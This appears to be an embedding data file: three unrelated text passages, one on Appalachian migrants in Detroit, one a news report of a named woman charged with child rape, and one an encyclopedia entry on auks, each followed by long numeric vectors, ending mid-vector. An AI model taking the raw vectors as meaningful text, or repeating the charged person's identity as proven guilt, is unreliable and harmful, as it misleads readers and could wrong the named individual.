said, 'I'll be right there with it.'" "That's the way it was," she adds. "They were right there for you." After opening Nancy Whiskey in 1987, McNiven-Glenn had Southern customers who liked to fill the bar with Hank Williams, Sr. songs (and, occasionally, spend their social security checks on rounds). Baker was especially fond of their beans and cornbread, the unofficial dish of Appalachia. "Cornbread dressing was my Carole Baker "They were hard workers, unlike what people say," Baker says. "They would always—plumbing problem, or take the plumbing out—" "—Oh, in a minute. They'd give you a hand there, sure," McNiven-Glenn adds. "—redo the floors, finish the woodwork. I always used Southern people because I could trust 'em." Baker also mentions the beautiful conditions of their apartments. I remark that this countered some accounts of their living situations. "No, I can remember them, they were absolutely gorgeous apartments," she says. "The front lawns and everything. [The Southerners] worked at the auto plants and they filled the schools up." Baker says the area deteriorated after the 1967 riots, in part because of fear narratives similar to those endured by Irish immigrants and the blockbusting endured by African-Americans. Over time, many of the Appalachians who stayed moved out to middle-class suburbs like Warren, Taylor, and Hazel Park (which still carry derogatory labels like "Taylortucky"). Some of the poorest Southern whites—many from West Virginia, Tennessee and, Kentucky—continued to live in North Corktown well into the late 20th century. From 1992 to 1994, John Hartigan, Jr. lived in Briggs (as it was then known) and studied its racial dynamics for his book, " When we speak, Hartigan says that the experience of poor Appalachian whites who remained in Briggs wasn't representative of the larger Appalachian migration. Those who got jobs moved to the suburbs in the 1970s and '80s, he says, but by this point, factory jobs were long gone. Those left behind, often the children of those early migrants, did odd jobs and often struggled with alcohol and drug abuse. "They didn't have the kind of opportunity the parents had," he said.
[ -0.025040052831172943, -0.029943935573101044, -0.007530313450843096, 0.04740801081061363, -0.011474058032035828, -0.004268062766641378, -0.05445830896496773, -0.06998059153556824, -0.1569548100233078, 0.028440693393349648, -0.041543181985616684, 0.02785748802125454, 0.018065806478261948, -0.02923894301056862, -0.0475231409072876, 0.0816040188074112, 0.023566188290715218, -0.01819799654185772, -0.032253772020339966, -0.019807657226920128, -0.05973142012953758, -0.026314832270145416, 0.002311393851414323, 0.09414452314376831, 0.06525944918394089, 0.012022788636386395, -0.03455830365419388, 0.09029705077409744, -0.07105950266122818, 0.08287020027637482, -0.0455191396176815, 0.03565060719847679, -0.08254343271255493, 0.08133528381586075, 0.08138014376163483, 0.011229283176362514, 0.03067586198449135, 0.11813721805810928, -0.02814573049545288, -0.07213471829891205, 0.025552067905664444, -0.047323521226644516, 0.03360741212964058, 0.0017605561297386885, -0.07739876955747604, -0.04893289878964424, -0.03962582349777222, 0.009177357889711857, -0.007451268844306469, 0.02178564853966236, 0.047617148607969284, -0.027684248983860016, -0.012493685819208622, -0.033847954124212265, 0.04760018736124039, 0.1268286108970642, -0.00681844400241971, -0.03921588882803917, -0.02398412674665451, 0.042808499187231064, -0.010515381582081318, -0.044087305665016174, -0.05216048285365105, -0.03134014457464218, -0.007651291321963072, -0.006072475109249353, -0.008498485200107098, -0.010879057459533215, -0.027198990806937218, -0.07136771082878113, 0.08887836337089539, -0.05749979615211487, -0.14521929621696472, -0.0014739871257916093, 0.07787447422742844, -0.0412059910595417, 0.05496063083410263, 0.06454801559448242, -0.011817548424005508, -0.07527004182338715, 0.01270068809390068, 0.01267032790929079, 0.04489036649465561, 0.008746949024498463, -0.11385715007781982, -0.04129592701792717, -0.09789793938398361, 0.051605407148599625, 0.07271146774291992, -0.03502369299530983, 0.026453806087374687, -0.039927009493112564, -0.06849218904972076, -0.07963024079799652, 0.0739133358001709, -0.02479032427072525, -0.051121052354574203, 0.0030517696868628263, 0.02601739764213562, -0.01453463640064001, 0.026938194409012794, -0.07053247094154358, 0.06256215274333954, -0.057352639734745026, 0.009302469901740551, -0.030426984652876854, 0.005046118050813675, 0.07337906211614609, -0.0851656123995781, 0.06138093024492264, 0.06922999769449234, 0.03661070764064789, -0.038655903190374374, 0.08700340241193771, 0.05694689229130745, -0.05448254197835922, 0.0027064336463809013, 0.005131291691213846, -0.027424821630120277, 0.057317908853292465, -0.0847795158624649, 0.08665461838245392, -0.0864521712064743, -0.026387667283415794, -0.054435864090919495, -0.006035310216248035, 0.011536425910890102, 7.4028813858147495e-34, 0.032225463539361954, -0.00756707601249218, 0.04347909241914749, 0.09722047299146652, 0.04800071939826012, -0.029469668865203857, -0.011845757253468037, 0.014728238806128502, -0.0001903540687635541, -0.026732753962278366, -0.011442160233855247, -0.005390840582549572, 0.03461470454931259, 0.017397034913301468, -0.0025678244419395924, -0.03260520473122597, -0.08380487561225891, -0.08651965111494064, -0.0342305488884449, -0.04600045457482338, -0.015492522157728672, 0.04273652285337448, 0.005181785207241774, 0.015508116222918034, -0.09835770726203918, -0.06985332816839218, -0.10719554126262665, -0.014589556492865086, -0.07912146300077438, 0.01729859784245491, -0.006691204849630594, 0.04338895529508591, 0.03610086813569069, -0.06471026688814163, 0.029420386999845505, 0.03454942628741264, 0.018567373976111412, -0.05631803348660469, -0.0726746916770935, -0.025808583945035934, -0.011880137957632542, -0.006455134600400925, -0.04889213293790817, 0.03877163305878639, 0.06853225827217102, 0.03515266627073288, 0.0732627734541893, 0.013858801685273647, -0.045236267149448395, 0.00867015402764082, 0.015945713967084885, 0.04250071942806244, 0.018331684172153473, -0.04700233042240143, -0.08191291242837906, 0.07908384501934052, 0.04355953633785248, 0.017534496262669563, 0.045569535344839096, 0.000849388656206429, 0.028631415218114853, 0.02329542115330696, 0.03803568333387375, -0.020274052396416664, 0.06552977114915848, -0.055220574140548706, 0.008335641585290432, 0.06747416406869888, -0.012686219997704029, 0.046314869076013565, 0.10033334046602249, -0.027750391513109207, -0.05154597386717796, 0.040752943605184555, 0.0802026316523552, 0.05336300656199455, -0.02007146365940571, 0.08926735818386078, 0.06054555997252464, -0.13187982141971588, 0.010402094572782516, 0.034681156277656555, -0.05906878039240837, 0.02767300046980381, 0.14299802482128143, -0.03728126734495163, -0.05477524921298027, -0.08565592765808105, 0.024101532995700836, 0.025975001975893974, -0.0181269533932209, 0.013372941873967648, 0.03039388358592987, -0.02041259966790676, -0.01906590163707733, -3.545731037777608e-33, -0.01182408258318901, 0.03738562390208244, 0.02644483745098114, 0.0029221319127827883, 0.006014038342982531, -0.0721072405576706, 0.05360834673047066, 0.015549257397651672, 0.08179137110710144, 0.008249027654528618, -0.037745922803878784, 0.03221486881375313, 0.10382610559463501, 0.05610581487417221, -0.012341202236711979, -0.048919472843408585, 0.03549050912261009, 0.010948803275823593, 0.006826547905802727, 0.0159238763153553, -0.014900065958499908, -0.053673382848501205, -0.07221774011850357, -0.017005467787384987, -0.01232993695884943, 0.0006980500766076148, -0.07978575676679611, 0.010118500329554081, -0.01130066066980362, 0.035808973014354706, 0.031979627907276154, 0.11863858252763748, 0.08555544167757034, -0.05042153224349022, -0.013890489935874939, 0.04542824253439903, 0.014733463525772095, 0.0025818569120019674, -0.004202613141387701, -0.064826101064682, 0.026309875771403313, -0.0008924771100282669, 0.07883013039827347, -0.021118247881531715, 0.012694078497588634, 0.015618711709976196, -0.019134532660245895, -0.0018822763813659549, -0.15264417231082916, 0.06690956652164459, 0.04891026392579079, 0.10239741951227188, -0.01479726005345583, 0.0949561819434166, 0.018998315557837486, -0.0014814827591180801, 0.010432534851133823, -0.013957450166344643, -0.037951018661260605, -0.012380551546812057, -0.07810549437999725, 0.06042641028761864, -0.03302665054798126, -0.005653492175042629, 0.07393776625394821, -0.0528867207467556, 0.010914994403719902, -0.05788351222872734, -0.021283045411109924, -0.07407320290803909, -0.015621871687471867, -0.0360022597014904, -0.024319393560290337, -0.08030033111572266, -0.04191037267446518, -0.060404013842344284, 0.03688794746994972, -0.04915320873260498, -0.037312038242816925, 0.003490367904305458, -0.026064541190862656, -0.06599190086126328, 0.018199900165200233, 0.05867965146899223, 0.01813051849603653, -0.028541794046759605, -0.02370842918753624, 0.024735242128372192, -0.01013974379748106, 0.02716202288866043, -0.007384182885289192, -0.07216950505971909, -0.09198246151208878, -0.03731062263250351, -0.08074921369552612, -5.174620198999946e-8, -0.003789319423958659, 0.12598536908626556, -0.04277333617210388, 0.03128661960363388, -0.0001587354636285454, -0.004719375167042017, 0.04630567133426666, 0.08434095978736877, 0.03173116594552994, 0.046596329659223557, -0.05572783201932907, 0.0352005697786808, 0.05355093255639076, 0.020462246611714363, -0.05155733972787857, 0.03334375470876694, 0.03461771830916405, -0.06255658715963364, -0.04221930354833603, -0.016852008178830147, 0.013236328028142452, 0.021624639630317688, 0.024040475487709045, 0.08907962590456009, -0.016517914831638336, -0.022379165515303612, -0.056024909019470215, 0.0028502221684902906, 0.0881330594420433, -0.014751585200428963, -0.0767575353384018, 0.08371306955814362, -0.012362336739897728, 0.0077717499807477, 0.038782164454460144, -0.022520314902067184, 0.03338766098022461, -0.00222999369725585, 0.0837969109416008, -0.08915756642818451, -0.05298704653978348, -0.004726032726466656, 0.005133635364472866, -0.028896568343043327, 0.019735796377062798, -0.05071694031357765, -0.016057828441262245, 0.07314317673444748, -0.05591493099927902, 0.022280918434262276, -0.045281775295734406, 0.01495345775038004, 0.007842432707548141, 0.08179362863302231, 0.030790796503424644, -0.05217171460390091, -0.005415273830294609, -0.06095876544713974, 0.0670984536409378, -0.02071271650493145, 0.0240760650485754, 0.07102884352207184, -0.02596956118941307, -0.031060926616191864 ]
The video will start in 8 Cancel Get the biggest daily news stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email A mum has been charged with raping a four-year-old boy after a vile attack was filmed and broadcast live on Periscope. India Kirksey was dragged into court after police say she admitting performing the sex act on the young child in Cincinnati, in the USA. The 20-year-old from West Price Hill was arrested after someone watching the live stream more than 1,000 miles away in Texas called the authorities. The judge threw Kirksey behind bars at Hamilton County Jail, setting her bail bond at $350,000 (£282,000). (Image: Hamilton County Sheriff Office) (Image: WLWT 5) Kirksey's arrest comes just a week after she posted two videos on YouTube of her twerking to music. In the videos she is in a bedroom, wearing small denim shorts and a white vest, as she dances for the camera while a child can be heard crying in the background.
[ -0.025692535564303398, 0.018131073564291, -0.004008645191788673, -0.028322486206889153, 0.03673892095685005, 0.053670890629291534, 0.03955339640378952, 0.06419842690229416, 0.01831698790192604, 0.028470773249864578, 0.07474233210086823, 0.011064027436077595, 0.044164929538965225, -0.05508669093251228, -0.0508880577981472, 0.009993989020586014, 0.08666558563709259, 0.051494844257831573, -0.05951375514268875, -0.012710393406450748, -0.0234917551279068, -0.02187333069741726, 0.12760977447032928, 0.01830611750483513, -0.0013274659868329763, 0.062444668263196945, 0.02255919761955738, -0.02040083520114422, -0.008916966617107391, 0.030688481405377388, 0.04135750234127045, -0.025762999430298805, 0.029522975906729698, 0.015249359421432018, -0.014171184040606022, 0.016277041286230087, 0.08788547664880753, 0.012727453373372555, 0.022712020203471184, 0.04632176086306572, 0.022871678695082664, -0.04374169558286667, -0.04713917523622513, 0.0001489440764999017, -0.027510056272149086, -0.043979477137327194, -0.001908625359646976, -0.04613862931728363, 0.024168387055397034, -0.1547233909368515, -0.05062922090291977, 0.03244820982217789, 0.036034319549798965, -0.009033706970512867, -0.10240480303764343, -0.05725524574518204, -0.011345041915774345, 0.06307458132505417, 0.03961896151304245, 0.0076416716910898685, -0.006504543591290712, 0.03746011480689049, 0.01745464652776718, 0.043206118047237396, -0.02694040536880493, -0.006651006639003754, 0.01013571210205555, -0.008694986812770367, 0.1394137144088745, 0.004980484489351511, 0.09054014831781387, 0.09042154997587204, -0.0876292958855629, -0.05420292168855667, -0.05828671157360077, -0.00689097261056304, 0.05801546573638916, 0.020388778299093246, 0.02817200869321823, -0.028885535895824432, -0.016193874180316925, -0.11268141865730286, 0.07000158727169037, -0.06313352286815643, -0.021360956132411957, -0.05456734821200371, -0.010954665951430798, 0.012831449508666992, 0.009490360505878925, 0.010492962785065174, 0.027510743588209152, 0.05344195291399956, -0.0638715997338295, -0.07042143493890762, -0.02801031619310379, -0.049883533269166946, -0.07713324576616287, -0.046094927936792374, -0.06691677123308182, 0.048911504447460175, -0.029064543545246124, 0.07847912609577179, -0.010907710529863834, -0.0098152169957757, 0.06575489044189453, -0.07634155452251434, 0.015101909637451172, 0.021531181409955025, -0.032768722623586655, -0.03134360909461975, -0.0027568333316594362, 0.03589486703276634, 0.012624796479940414, 0.03947697579860687, 0.046858109533786774, 0.03427639976143837, -0.00865570455789566, 0.04690563306212425, 0.0030076380353420973, -0.08073174953460693, 0.034282583743333817, 0.0065554105676710606, -0.06079486757516861, 0.10368318110704422, -0.041813332587480545, -0.06532951444387436, -0.0379190668463707, 7.284068294305387e-33, 0.027477620169520378, -0.013696268200874329, 0.01509267557412386, -0.07747314870357513, 0.00885641947388649, 0.07227956503629684, -0.025331314653158188, -0.0329153798520565, -0.0470636710524559, 0.09442158788442612, 0.0013364263577386737, -0.120796337723732, 0.0496533028781414, -0.17181898653507233, -0.004419760778546333, 0.0482487715780735, -0.0458325631916523, 0.043632008135318756, -0.040816981345415115, 0.10041456669569016, 0.08316175639629364, 0.05478248372673988, 0.054065607488155365, 0.028515368700027466, -0.1291133165359497, -0.034280482679605484, 0.040263980627059937, 0.032359350472688675, 0.042870838195085526, -0.01182890310883522, -0.10900072008371353, -0.0012579970061779022, 0.08679644018411636, 0.03131818026304245, 0.014717952348291874, -0.04385777935385704, 0.021267646923661232, -0.03697894513607025, 0.013333071954548359, 0.051097359508275986, -0.10755013674497604, -0.019284240901470184, 0.00590972974896431, -0.03788113221526146, -0.11543156206607819, -0.023759838193655014, 0.014770589768886566, -0.036333631724119186, -0.027388790622353554, 0.014125809073448181, 0.029910599812865257, 0.034901246428489685, 0.03893747553229332, 0.006165249738842249, -0.10780680179595947, 0.11730112880468369, 0.03570659086108208, -0.04291273653507233, 0.07093779742717743, 0.12211893498897552, 0.11869769543409348, 0.005781669169664383, -0.020264439284801483, -0.09215029329061508, -0.030559873208403587, -0.056436989456415176, 0.06048791855573654, 0.01059820968657732, -0.10366267710924149, 0.019060369580984116, 0.04163378104567528, 0.05215331166982651, 0.03096385858952999, 0.003569284686818719, 0.026262152940034866, 0.004872661549597979, 0.02644685097038746, -0.03466169163584709, -0.015899043530225754, 0.03301916643977165, 0.024561583995819092, -0.08168771117925644, 0.09557072818279266, -0.016750678420066833, 0.07099989801645279, -0.0416061207652092, -0.0069899666123092175, -0.044089481234550476, 0.008884983137249947, 0.07344499230384827, 0.012372412718832493, -0.017471149563789368, -0.0661655068397522, -0.050562940537929535, 0.03184415400028229, -7.9970702702684e-33, 0.0005059701506979764, -0.011178948916494846, -0.0586986318230629, -0.02227737195789814, 0.03490776568651199, -0.04496437683701515, -0.014337943866848946, 0.036748964339494705, 0.06437008082866669, -0.0372101292014122, 0.020020820200443268, -0.11331178992986679, -0.030714722350239754, 0.036816418170928955, 0.006740930490195751, 0.01429749559611082, -0.006123702973127365, 0.08705485612154007, -0.0747431144118309, 0.02113826759159565, -0.02365398034453392, 0.014521254226565361, -0.022560851648449898, 0.09791414439678192, -0.0016969875432550907, -0.03399203345179558, 0.048251375555992126, 0.11438197642564774, -0.03801005706191063, 0.025129536166787148, 0.01987287402153015, -0.07857105135917664, 0.002456745831295848, 0.06614533811807632, -0.06638823449611664, 0.007381956093013287, 0.023527292534708977, -0.055823855102062225, 0.06043950095772743, -0.00027470121858641505, 0.028021633625030518, 0.06263969093561172, -0.034858327358961105, 0.03975168243050575, -0.03887072950601578, 0.018392086029052734, -0.04436618834733963, 0.12170607596635818, -0.000456419336842373, -0.057247526943683624, -0.08197115361690521, 0.05900856852531433, 0.014037230983376503, 0.09721636772155762, -0.03534188121557236, -0.012782271951436996, -0.03710431978106499, 0.0575437918305397, -0.01242866087704897, -0.05337857827544212, 0.001996333710849285, -0.006004544906318188, -0.09118720889091492, -0.05015961825847626, 0.02708052098751068, -0.017477480694651604, -0.0715792253613472, -0.045563384890556335, -0.05652144178748131, -0.0036508182529360056, 0.03664735332131386, -0.016629278659820557, 0.0029300893656909466, -0.019902624189853668, 0.007481108419597149, 0.04169867932796478, -0.008101249113678932, 0.055042415857315063, 0.017059411853551865, -0.01999053917825222, 0.04981055483222008, -0.03547080606222153, 0.019193530082702637, -0.038785096257925034, 0.014065937139093876, 0.052313391119241714, 0.07565265148878098, -0.043670687824487686, -0.03213005140423775, -0.04568898305296898, 0.01335142832249403, -0.05546078085899353, -0.01876598782837391, 0.09357838332653046, -0.012775187380611897, -5.614400322428992e-8, -0.0597604438662529, 0.010634374804794788, -0.06462810933589935, 0.009638679213821888, 0.05840162932872772, 0.06477553397417068, 0.009911018423736095, -0.03126329928636551, -0.028293561190366745, 0.019911224022507668, -0.014411041513085365, -0.03488626331090927, 0.011251041665673256, -0.08671154081821442, -0.11732421815395355, -0.007533700205385685, 0.005643373820930719, -0.01055854931473732, 0.018833762034773827, 0.005255574360489845, -0.030085695907473564, -0.017080817371606827, 0.06993063539266586, -0.01177702285349369, -0.002990724053233862, -0.028966398909687996, -0.0009304601699113846, 0.033650293946266174, 0.012483595870435238, -0.0627957209944725, -0.020328620448708534, -0.053455714136362076, -0.06692052632570267, 0.03148633614182472, 0.011533684097230434, -0.0465584434568882, -0.07317058742046356, 0.09473296254873276, 0.044018615037202835, 0.06224992498755455, -0.05137995630502701, -0.06713170558214188, 0.01801922917366028, 0.03165391460061073, 0.049683909863233566, 0.07207067310810089, -0.08917109668254852, -0.017418203875422478, 0.06895751506090164, 0.008873763494193554, -0.029210437089204788, -0.0031443610787391663, -0.012263952754437923, 0.014020315371453762, 0.07962016761302948, 0.04171402379870415, -0.03765784949064255, 0.010230162180960178, -0.0734034851193428, 0.06989064067602158, -0.05033917352557182, -0.05892791226506233, 0.03507734462618828, -0.06362535804510117 ]
This article is about a family of birds. For the ornithological journal, see The Auk . For other meanings, see AUK "Auklet" redirects here. For the fishery patrol vessel, see MV Auklet An auk or alcid is a bird of the family Alcidae in the order Charadriiformes. The alcid family includes the murres, guillemots, auklets, puffins, and murrelets. Apart from the extinct great auk, all auks are notable for their ability to "fly" under water as well as in the air. Although they are excellent swimmers and divers, their walking appears clumsy. Several species have different common names in Europe and North America. The guillemots of Europe are referred to as murres in North America, if they occur in both continents, and the little auk is referred to as the dovekie. Description [ edit ] Auks are superficially similar to penguins having black-and-white colours, upright posture and some of their habits. Nevertheless, they are not closely related to penguins, but rather are believed to be an example of moderate convergent evolution. Auks are monomorphic (males and females are similar in appearance). Extant auks range in size from the least auklet, at 85 g (3 oz) and 15 cm (5.9 in), to the thick-billed murre, at 1 kg (2.2 lb) and 45 cm (18 in). Due to their short wings, auks have to flap their wings very quickly in order to fly. Although not to the extent of penguins, auks have largely sacrificed flight, and also mobility on land, in exchange for swimming ability; their wings are a compromise between the best possible design for diving and the bare minimum needed for flying. This varies by subfamily, the Uria guillemots (including the razorbill) and murrelets being the most efficient under the water, whereas the puffins and auklets are better adapted for flying and walking. Feeding and ecology [ edit ] The feeding behaviour of auks is often compared to that of penguins; both groups are wing-propelled pursuit divers. In the region where auks live, their only seabird competition are cormorants (which are dive-powered by their strong feet). In areas where the two groups feed on the same prey, the auks tend to feed further offshore. Strong-swimming murres hunt faster schooling fish, whereas auklets take slower-moving krill. Time depth recorders on auks have shown that they can dive as deep as 100 m in the case of Uria guillemots, 40 m for the Cepphus guillemots and 30 m for the auklets. Breeding and colonies [ edit ] Auks are pelagic birds, spending the majority of their adult life on the open sea and going ashore only for breeding, although some species — like the common guillemot — spend a great part of the year defending their nesting spot from others. Auks are monogamous, and tend to form lifelong pairs. They typically lay a single egg, and they are philopatric (they use the nesting site year after year). Some species, such as the Uria guillemots, nest in large colonies on cliff edges; others, like the Cepphus guillemots, breed in small groups on rocky coasts; and the puffins, auklets and some murrelets nest in burrows. All species except the Brachyramphus murrelets are colonial. Evolution and distribution [ edit ] Traditionally, the auks were believed to be one of the earliest distinct charadriiform lineages due to their characteristic morphology. However, genetic analyses have demonstrated that these peculiarities are the product of strong natural selection instead: as opposed to, for example, plovers (a much older charadriiform lineage), auks radically changed from a wading shorebird to a diving seabird lifestyle. Thus, today, the auks are no longer separated in their own suborder ("Alcae"), but are considered part of the Lari suborder which otherwise contains gulls and similar birds. Judging from genetic data, their closest living relatives appear to be the skuas, with these two lineages separating about 30 million years ago (mya).[1][2][3] Alternatively, auks may have split off far earlier from the rest of the Lari and undergone strong morphological, but slow genetic evolution, which would require a very high evolutionary pressure, coupled with a long lifespan and slow reproduction. The earliest unequivocal fossils of auks are from the late Eocene, some 35 mya.[4] The genus Miocepphus, (from the Miocene, 15 mya) is the earliest known from good specimens. Two very fragmentary fossils are often assigned to the Alcidae, although this may not be correct: Hydrotherikornis (late Eocene) and Petralca (Late Oligocene). Most extant genera are known to exist since the Late Miocene or Early Pliocene (c. 5 mya). Miocene fossils have been found in both California and Maryland, but the greater diversity of fossils and tribes in the Pacific leads most scientists to conclude that it was there they first evolved, and it is in the Miocene Pacific that the first fossils of extant genera are found. Early movement between the Pacific and the Atlantic probably happened to the south (since there was no northern opening to the Atlantic), later movements across the Arctic Ocean.[5] The flightless subfamily Mancallinae, which was apparently restricted to the Pacific coast of southern North America and became extinct in the Early Pleistocene, is sometimes includes in the family Alcidae under some definitions. One species, Miomancalla howardae, is the largest charadriiform of all time.[6] Razorbills are true auks only found in the Atlantic Ocean The extant auks (subfamily Alcinae) are broken up into 2 main groups: the usually high-billed puffins (tribe Fraterculini) and auklets (tribe Aethiini), as opposed to the more slender-billed murres and true auks (tribe Alcini), and the murrelets and guillemots (tribes Brachyramphini and Cepphini). The tribal arrangement was originally based on analyses of morphology and ecology.[7] mtDNA cytochrome b sequence and allozyme studies[1][2] confirm these findings except that the Synthliboramphus murrelets should be split into a distinct tribe, as they appear more closely related to the Alcini – in any case, assumption of a closer relationship between the former and the true guillemots was only weakly supported by earlier studies.[7] Of the genera there are only a few species in each. This is probably a product of the rather small geographic range of the family (the most limited of any seabird family), and the periods of glacial advance and retreat that have kept the populations on the move in a narrow band of subarctic ocean. Today, as in the past, the auks are restricted to cooler northern waters. Their ability to spread further south is restricted as their prey hunting method, pursuit diving, becomes less efficient in warmer waters. The speed at which small fish (which along with krill are the auk's principal food items) can swim doubles as the temperature increases from 5 to 15 °C (41 to 59 °F), with no corresponding increase in speed for the bird. The southernmost auks, in California and Mexico, can survive there because of cold upwellings. The current paucity of auks in the Atlantic (6 species), compared to the Pacific (19–20 species) is considered to be because of extinctions to the Atlantic auks; the fossil record shows there were many more species in the Atlantic during the Pliocene. Auks also tend to be restricted to continental shelf waters and breed on few oceanic islands. Hydotherikornis oregonus (Described by Miller in 1931), the oldest purported alcid from the Eocene of California, is actually a petrel (as reviewed by Chandler in 1990) and is reassigned to the tubenoses (Procellariiformes). A 2003 paper entitled "The Earliest North American Record of Auk (Aves: Alcidae) From the Late Eocene of Central Georgia" by Robert M. Chandler and Dennis Parmley of Georgia College and State University reports a Late Eocene, wing-propelled diving, auk from the Priabonain Stage of the Late Eocene. These sediments have been dated through Chandronian NALMA {North American Land Mammal Age}, at an estimate of 34.5 to 35.5 million years on the Eocene time scale for fossil bearing sediments of the Clinchfield Formation, Gordon, Wilkinson County, Georgia. Furthermore, the sediments containing this unabraded portion of a left humerus (43.7 mm long) are tropical or sub-tropical as evidenced by a wealth of warm water shark teeth, palaeophied snake vertebrae and turtles. Systematics [ edit ] Biodiversity of auks seems to have been markedly higher during the Pliocene.[5] See the genus accounts for prehistoric species. See also [ edit ] Kiviak, a traditional Inuit food from Greenland that is made of auks preserved in seal skin Tradeoffs for locomotion in air and water References [ edit ]
[ -0.06886381655931473, 0.060336627066135406, -0.040338002145290375, 0.031386371701955795, 0.027427151799201965, -0.12819644808769226, 0.026774590834975243, -0.03683193773031235, 0.04767482355237007, 0.009995367377996445, 0.023771140724420547, -0.13063563406467438, -0.03907347097992897, 0.052606575191020966, -0.09090355038642883, 0.039090368896722794, -0.05289766564965248, 0.0038494605105370283, 0.0028297631070017815, 0.1294163018465042, -0.005930088460445404, 0.015372216701507568, 0.05119391530752182, 0.059294700622558594, -0.08050484210252762, -0.021601777523756027, -0.012210536748170853, 0.019253093749284744, -0.003988318610936403, -0.04685426130890846, -0.0863780826330185, -0.0389544777572155, 0.05669254809617996, 0.056951723992824554, -0.010506576858460903, 0.04672272875905037, 0.0455707348883152, 0.04346879944205284, 0.0006817164830863476, -0.03182889521121979, 0.09206795692443848, -0.00876085925847292, 0.05808718875050545, 0.05359964445233345, -0.040104642510414124, 0.09171731770038605, -0.08702430874109268, 0.04040434956550598, 0.0018265978433191776, 0.06849467754364014, -0.014470065012574196, -0.11165057122707367, -0.04388267546892166, 0.04566328972578049, 0.031888656318187714, 0.027920173481106758, -0.1287277191877365, -0.11097713559865952, 0.023413725197315216, -0.0644160658121109, 0.0341997928917408, 0.03775187209248543, -0.026585709303617477, 0.02087433822453022, -0.08981036394834518, 0.0010233246721327305, -0.13352181017398834, -0.018024716526269913, 0.07731414586305618, 0.0053618792444467545, 0.04827137663960457, -0.04138882830739021, -0.004157352726906538, 0.05996296927332878, -0.052164606750011444, 0.09651215374469757, 0.015889791771769524, -0.021127769723534584, -0.05213461071252823, -0.039148375391960144, -0.026701264083385468, -0.051174595952034, 0.01656089723110199, 0.01592184416949749, 0.051189716905355453, -0.031913019716739655, 0.0024624490179121494, -0.06166685372591019, -0.11542760580778122, -0.008071811869740486, -0.04565862566232681, -0.018649648874998093, 0.008745761588215828, -0.11457738280296326, 0.086530402302742, -0.011452590115368366, 0.07582714408636093, 0.02134733647108078, -0.07380890101194382, 0.049599871039390564, 0.017952892929315567, 0.003592453431338072, 0.08254090696573257, 0.026164449751377106, 0.04529602825641632, -0.05834425613284111, 0.028784532099962234, -0.07420559227466583, 0.07566359639167786, -0.06945633888244629, -0.1048087328672409, -0.006937676575034857, -0.05269832909107208, 0.028653843328356743, -0.0127812335267663, -0.005069075617939234, -0.15349921584129333, -0.014611882157623768, 0.01979435794055462, -0.002914929063990712, -0.018036989495158195, 0.04359487444162369, -0.008151750080287457, -0.025044001638889313, 0.13074412941932678, 0.018045123666524887, -0.021974360570311546, 1.0124073666151572e-33, -0.005247905384749174, -0.03851049020886421, -0.02623451128602028, -0.027455106377601624, 0.022767482325434685, -0.0612749308347702, -0.040004387497901917, -0.06749250739812851, -0.03018965572118759, -0.002094580791890621, -0.028586391359567642, 0.02876155450940132, -0.06542370468378067, 0.08546958118677139, 0.046435318887233734, 0.00332825630903244, 0.02539064548909664, -0.036434467881917953, 0.0030480630230158567, -0.0605430081486702, 0.0025516997557133436, 0.037872422486543655, -0.00532758142799139, -0.0033992778044193983, 0.00035774000571109354, -0.05214877054095268, -0.026112180203199387, -0.05121476575732231, -0.05623672157526016, 0.06319928169250488, 0.0071524507366120815, 0.017886824905872345, -0.02609255537390709, 0.04521609842777252, -0.10081135481595993, 0.04529700428247452, 0.058879345655441284, -0.10350096970796585, -0.012727731838822365, 0.04703409969806671, 0.014453699812293053, -0.10073133558034897, -0.004192698281258345, 0.04957931116223335, 0.023441966623067856, -0.07756781578063965, 0.0361778549849987, 0.042280007153749466, 0.004344423301517963, 0.04723910614848137, 0.0041413577273488045, -0.05061798170208931, -0.007062647957354784, -0.05743373930454254, -0.022851580753922462, 0.01314843911677599, 0.011135958135128021, 0.026580195873975754, -0.09581708908081055, -0.014776209369301796, 0.013508370146155357, -0.03541060909628868, 0.006791376043111086, -0.010262144729495049, 0.08816085755825043, 0.03858508542180061, -0.0054459585808217525, 0.0037640209775418043, -0.07450926303863525, 0.039844125509262085, 0.02354481630027294, -0.0036968665663152933, 0.03318838030099869, -0.05821353197097778, 0.01956111378967762, 0.08793899416923523, 0.08115433156490326, -0.003322211792692542, -0.028242820873856544, 0.014130608178675175, -0.035983677953481674, 0.08991768956184387, -0.018417786806821823, -0.022913306951522827, -0.09882472455501556, 0.010925618931651115, 0.097212053835392, 0.03250070661306381, 0.03885394334793091, -0.012922688387334347, 0.006607669871300459, 0.05506165698170662, 0.0016904056537896395, -0.048423826694488525, -0.03851223364472389, -2.8679189545743993e-33, -0.03454277664422989, -0.020258011296391487, -0.045073579996824265, 0.049727726727724075, -0.015532083809375763, 0.029213977977633476, 0.03394084796309471, 0.09336163103580475, 0.014902882277965546, -0.09112835675477982, -0.10377063602209091, 0.02746368758380413, 0.06384344398975372, -0.02797839604318142, 0.04069233313202858, 0.05875885486602783, -0.008323884569108486, 0.10745512694120407, 0.11346275359392166, -0.0823461264371872, 0.010379862040281296, 0.033085811883211136, 0.026341548189520836, -0.011021609418094158, 0.019927775487303734, 0.039997778832912445, 0.009930828586220741, 0.02547469735145569, -0.10527222603559494, -0.031419090926647186, -0.005533924791961908, 0.08902106434106827, 0.1011141985654831, 0.044237732887268066, -0.05414874851703644, 0.05324366316199303, -0.03963863477110863, 0.02510669268667698, -0.0630359873175621, -0.024327456951141357, -0.024122806265950203, -0.05664123222231865, -0.0027753643225878477, -0.04394243657588959, 0.050564203411340714, 0.000983571633696556, 0.00016087526455521584, 0.06102238968014717, 0.0019121983787044883, -0.057231251150369644, 0.029204852879047394, 0.007624642923474312, 0.05532029643654823, 0.044130440801382065, 0.018991177901625633, 0.057444121688604355, 0.0013663179706782103, 0.023524751886725426, 0.020805077627301216, -0.02263045124709606, -0.01966627687215805, 0.02064739540219307, 0.04289456084370613, 0.06840940564870834, -0.016717879101634026, -0.02264813706278801, -0.1262214332818985, -0.01590970903635025, 0.0036943736486136913, 0.01765025593340397, 0.033789150416851044, -0.006948518101125956, -0.03987656906247139, -0.05267016962170601, 0.05302361026406288, 0.06353642046451569, 0.027097664773464203, -0.06058540940284729, -0.013440338894724846, -0.0025321298744529486, -0.07267186045646667, 0.10024990141391754, 0.025450604036450386, 0.050518255680799484, -0.13654330372810364, 0.024708768352866173, -0.005609344225376844, 0.020654505118727684, 0.00728423148393631, 0.059317782521247864, 0.02635916881263256, 0.06222283095121384, -0.0675830990076065, 0.022324213758111, 0.012215902097523212, 